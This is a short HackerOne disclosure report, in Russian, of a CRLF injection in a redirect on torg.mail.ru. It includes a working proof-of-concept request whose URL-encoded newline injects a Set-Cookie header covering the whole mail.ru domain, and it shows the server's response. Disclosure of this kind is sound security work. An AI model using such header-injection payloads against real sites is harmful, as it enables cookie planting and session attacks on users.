Mail.ru: [torg.mail.ru] CRLF Injection

2016-05-12T15:46:44
ID H1:138332
Type hackerone
Reporter s_p_q_r
Modified 2016-12-12T12:45:28

Description

Редирект http://torg.mail.ru//foo → http://torg.mail.ru/foo подвержен CRLF-инъекции, что позволяет атакующему внедрить произвольный заголовок в ответ сервера.

Пример установки значения куки для всего домена mail.ru:

> GET http://torg.mail.ru//xxx%0ASet-Cookie:test=test;domain=.mail.ru > > 301 Moved Permanently > > Location: http://torg.mail.ru/xxx > Set-Cookie: test=test;domain=.mail.ru